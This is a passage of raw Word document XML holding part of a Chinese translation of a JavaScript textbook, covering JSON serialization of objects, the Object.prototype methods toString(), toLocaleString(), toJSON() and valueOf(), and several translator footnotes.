      </w:pPr>
      <w:bookmarkStart w:id="155" w:name="6_9_Xu_Lie_Hua_Dui_Xiang_"/>
      <w:r>
        <w:t>6.9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　序列化对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="155"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象序列化（</w:t>
      </w:r>
      <w:r>
        <w:t>serialization</w:t>
      </w:r>
      <w:r>
        <w:t>）是指将对象的状态转换为字符串，也可将字符串还原为对象。</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>提供了内置函数</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>用来序列化和还原</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象。这些方法都使用</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>作为数据交换格式，</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>的全称是</w:t>
      </w:r>
      <w:r>
        <w:t>"JavaScript Object Notation"——JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示法，它的语法和</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象与数组直接量的语法非常相近：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>o={x:1,y:{z:[false,null,""]}};//</w:t>
      </w:r>
      <w:r>
        <w:t>定</w:t>
      </w:r>
      <w:r>
        <w:t>义一个测试对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s=JSON.stringify(o);//s</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>'{"x":1,"y":{"z":[false,null,""]}}'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>p=JSON.parse(s);//p</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的深拷贝</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中的这些函数的本地实现和</w:t>
      </w:r>
      <w:r>
        <w:t>http://json.org/json2.js</w:t>
      </w:r>
      <w:r>
        <w:t>中的公共域</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>版本的实现非常类似，或者说完全一样，因此可以通过引入</w:t>
      </w:r>
      <w:r>
        <w:t>json2.js</w:t>
      </w:r>
      <w:r>
        <w:t>模块在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>的环境中使用</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中的这些函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>的语法是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语法的子集，它并不能表示</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>里的所有值。支持对象、数组、字符串、无穷大数字、</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，并且它们可以序列化和还原。</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>-Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>序列化的结果是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，日期对象序列化的结果是</w:t>
      </w:r>
      <w:r>
        <w:t>ISO</w:t>
      </w:r>
      <w:r>
        <w:t>格式的日期字符串（参照</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>函数），但</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>依然保留它们的字符串形态，而不会将它们还原为原始日期对象。函数、</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>值不能序列化和还原。</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.str</w:t>
      </w:r>
      <w:r>
        <w:t>ingify()</w:t>
      </w:r>
      <w:r>
        <w:t>只能序列化对象可枚举的自有属性。对于一个不能序列化的属性来说，在序列化后的输出字符串中会将这个属性省略掉。</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>都可以接收第二个可选参数，通过传入需要序列化或还原的属性列表来定制自定义的序列化或还原操作。第三部分有关于这些函数的详细文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="156" w:name="6_10_Dui_Xiang_Fang_Fa_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　对象方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="156"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上文已经讨论过，所有的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象都从</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>继承属性（除了那些不通过原型显式创建的对象）。这些继承属性主要是方法，因为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序员普</w:t>
      </w:r>
      <w:r>
        <w:t>遍对继承方法更感兴趣。我们已经讨论过</w:t>
      </w:r>
      <w:r>
        <w:t>hasOwnProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>propertyIsEnumerable()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>isPrototypeOf()</w:t>
      </w:r>
      <w:r>
        <w:t>这三个方法，以及在</w:t>
      </w:r>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数里定义的静态函数</w:t>
      </w:r>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Object.getPrototypeOf()</w:t>
      </w:r>
      <w:r>
        <w:t>等。本节将对定义在</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>里的对象方法展开讲解，这些方法非常好用而且使用广泛，但一些特定的类会重写这些方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="157" w:name="6_10_1_toString__Fang_Fa_"/>
      <w:r>
        <w:t>6.10.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="157"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法没有参数，它将返回一个表示调用这个方</w:t>
      </w:r>
      <w:r>
        <w:t>法的对象值的字符串。在需要将对象转换为字符串的时候，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>都会调用这个方法。比如，当使用</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符连接一个字符串和一个对象时或者在希望使用字符串的方法中使用了对象时都会调用</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>默认的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的返回值带有的信息量很少（尽管它在检测对象的类型时非常有用，参照</w:t>
      </w:r>
      <w:r>
        <w:t>6.8.2</w:t>
      </w:r>
      <w:r>
        <w:t>节），例如，下面这行代码的计算结果为字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"[object Object]"</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s={x:1,y:1}.toString();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于默认的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法并不会输出很多有用的信</w:t>
      </w:r>
      <w:r>
        <w:t>息，因此很多类都带有自定义的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>。例如，当数组转换为字符串的时候，结果是一个数组元素列表，只是每个元素都转换成了字符串，再比如，当函数转换为字符串的时候，得到函数的源代码。第三部分有关于</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>的详细文档说明，比如</w:t>
      </w:r>
      <w:r>
        <w:t>Array.toString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toString()</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>Function.toString()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>9.6.3</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍如何给自定义类重写</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="158" w:name="6_10_2_toLocaleString__Fang_Fa_"/>
      <w:r>
        <w:t>6.10.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="158"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了基本的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法之外，对象都</w:t>
      </w:r>
      <w:r>
        <w:t>包含</w:t>
      </w:r>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，这个方法返回一个表示这个对象的本地化字符串。</w:t>
      </w:r>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:t>中默认的</w:t>
      </w:r>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法并不做任何本地化自身的操作，它仅调用</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法并返回对应值。</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>类对</w:t>
      </w:r>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法做了定制，可以用它对数字、日期和时间做本地化的转换。</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>类的</w:t>
      </w:r>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法很像，唯一的不同是每个数组元素会调用</w:t>
      </w:r>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法转换为字符串，而不是调用各自的</w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t>String()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="159" w:name="6_10_3_toJSON__Fang_Fa_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.10.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="159"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>实际上没有定义</w:t>
      </w:r>
      <w:r>
        <w:t>toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，但对于需要执行序列化的对象来说，</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会调用</w:t>
      </w:r>
      <w:r>
        <w:t>toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。如果在待序列化的对象中存在这个方法，则调用它，返回值即是序列化的结果，而不是原始的对象。具体示例参见</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="160" w:name="6_10_4_valueOf__Fang_Fa_"/>
      <w:r>
        <w:t>6.10.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="160"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法非常类似，但往往当</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>需要将对象转换为某种原始值而非字符串的时候才会调用它，尤其是转换为数字的时候。如果在需要使用原始值的上下文中使用了对象，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>就会自动调用这个方法。默认的</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法不足为奇，但有些内置类自定义了</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（比如</w:t>
      </w:r>
      <w:r>
        <w:t>Date.valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>），</w:t>
      </w:r>
      <w:r>
        <w:t>9.6.3</w:t>
      </w:r>
      <w:r>
        <w:t>节讨论如何给自定义对象类型定义</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>property</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>attribute</w:t>
      </w:r>
      <w:r>
        <w:t>都可以单独理解为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，在这里</w:t>
      </w:r>
      <w:r>
        <w:t>pro</w:t>
      </w:r>
      <w:r>
        <w:t>perty attribute</w:t>
      </w:r>
      <w:r>
        <w:t>是一个词组，意思是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>属性的特性</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，随后提到的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>可写</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>可枚举</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>可配置</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>即是属性的三种特性。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>一致认为</w:t>
      </w:r>
      <w:r>
        <w:t>Douglas Crockford</w:t>
      </w:r>
      <w:r>
        <w:t>是最早提出用这种方法实现对象继承函数的人，参照：</w:t>
      </w:r>
      <w:r>
        <w:t>http://javascript.crockford.com/prototypal.html</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>强类型，为所有变量指定数据类型称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>强类型</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。强</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>弱类型是指类型检查的严格程度。语言有无类型、弱类型和强类型三种。无类型的不检查，甚至不区分指令和数据。弱类型的检查很弱，仅能严格地</w:t>
      </w:r>
      <w:r>
        <w:t>区分指令和数据。强类型的则严格的在编译期间进行检查。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>这里的意思是可以动态地给对象添加属性。严格讲，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性个数是有上限的。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>程序不能修改标识符</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的意思是说，在程序运行时无法动态指定一个标识符，当然</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t>除外。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>a={p:{x:1}};b=a.p;delete a.p;</w:t>
      </w:r>
      <w:r>
        <w:t>执行这段代码之后</w:t>
      </w:r>
      <w:r>
        <w:t>b.x</w:t>
      </w:r>
      <w:r>
        <w:t>的值依然是</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>。由于已经删除的属性的引用依然存在，因此在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的某些实现中，可能因为这种不严谨的代码而造成内存泄漏。所以在销毁对象的时候，要遍历属性中的属性，</w:t>
      </w:r>
      <w:r>
        <w:t>依次删除。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>这里所实现的</w:t>
      </w:r>
      <w:r>
        <w:t>extend()</w:t>
      </w:r>
      <w:r>
        <w:t>逻辑虽然正确，但并不能弥补</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中有一些众所周知的</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:t>，在例</w:t>
      </w:r>
      <w:r>
        <w:t>8-3</w:t>
      </w:r>
      <w:r>
        <w:t>中会有更健壮的</w:t>
      </w:r>
      <w:r>
        <w:t>extend()</w:t>
      </w:r>
      <w:r>
        <w:t>实现。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:r>
        <w:t>包括除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>之外的最新主流浏览器的</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>的实现。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:r>
        <w:t>笛卡尔坐标系就是直角坐标系和斜角坐标系的统称。相交于原点的两条数轴，构成了平面放射坐标系。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[10]</w:t>
      </w:r>
      <w:r>
        <w:t>实际上是这些类型的变量调用</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，而不是通过它们的直接量调用</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>，比如</w:t>
      </w:r>
      <w:r>
        <w:t>1.toString()</w:t>
      </w:r>
      <w:r>
        <w:t>是不对的，而是要先声明变量</w:t>
      </w:r>
      <w:r>
        <w:t>var a=1</w:t>
      </w:r>
      <w:r>
        <w:t>；然后</w:t>
